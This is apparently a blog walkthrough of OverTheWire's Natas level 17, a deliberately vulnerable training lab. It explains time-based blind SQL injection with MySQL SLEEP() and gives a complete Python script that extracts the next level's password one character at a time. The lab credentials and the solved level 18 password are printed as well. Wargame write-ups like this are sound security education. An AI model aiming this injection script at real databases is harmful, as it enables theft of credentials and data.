Natas · OverTheWire

Natas Level 17 → Level 18

Level 17

Username : natas17
Password :8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
URL : http://natas17.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas17 application using the credentials provided above.
Right off the bat, the application is reminiscent of level 15 with a slight and interesting twist. This time around, the application does not return anything back to the user which might leak information about the user’s existence in the database. Given that everything else remains the same as level 15, the application might still be equally vulnerable to our attack from the last time. In such a case, a sound idea would be to create  a query that leaks information about the password. In the last case, we had the if-else cases which helped us determine the password. In this case, if we can make the results of our query leak information, we will be able to guess the password.
Therefore, we need to make a query which does the following:

if(character is in password):
    Do this
else:
    Don't do it

Such attacks are generally referred to as side-channel attacks, which means that the channel of carrying out the attack is not through the normal flow of an application but through a different medium.
As we are aware, MySQL provides a lot of different functions and one great function for testing for SQL injection is Sleep(). The reason why it’s a great function is that it does not rely on the type of database or table and does not need any inputs from the table. Let’s try to create a python code which utilizes the sleep command to leak information about the password.

import urllib2
alphanumericChars='1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
passwordChars=''
password=''
debug=0
targetURL='http://natas17.natas.labs.overthewire.org/'
REQ=urllib2.Request(targetURL, headers={"Authorization" : "Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=="})
try:
    contents = urllib2.urlopen(REQ).read()
    if debug:
        print contents
except urllib2.HTTPError as e:
        print e.code
        print e.read()
def findPassChars():
    global debug, passwordChars, targetURL, passString
    for c in alphanumericChars:
        completeURL=targetURL+'?debug='+ str(debug) +'&username=natas18"+and+password+like+BINARY+"%'+c+'%"+AND+SLEEP(5)=0+AND+"X"="X'
        try:
            REQ=urllib2.Request(completeURL, headers={"Authorization" : "Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=="})
            contents = urllib2.urlopen(REQ, timeout=1.0).read()
        except IOError as e: 
            passwordChars+= c
            print 'Password contains character     :    ' + c 
                         
def findPassword():
    global debug, passwordChars, targetURL, password
    for i in range(32):
        for c in passwordChars:
            completeURL=targetURL+'?debug='+ str(debug) +'&username=natas18"+and+password+like+BINARY+"'+password+c+'%"+AND+SLEEP(5)=0+AND+"X"="X'
            print completeURL
            try: 
                REQ=urllib2.Request(completeURL, headers={"Authorization" : "Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=="})
                contents = urllib2.urlopen(REQ, timeout=1.0).read()
            except IOError as e:
                if debug:
                    print contents
                password += c
                print 'Current password evaluation:' + password
                break
    print password

#Find characters in the password
findPassChars()

#Find password based on the characters found using findPassChars()
findPassword()

Using the above code, we can find out the password for the next round.
Note: Catch IOError to be able to catch timeout exceptions.

Level 18

Username : natas18
Password : xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
URL : http://natas18.natas.labs.overthewire.org

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s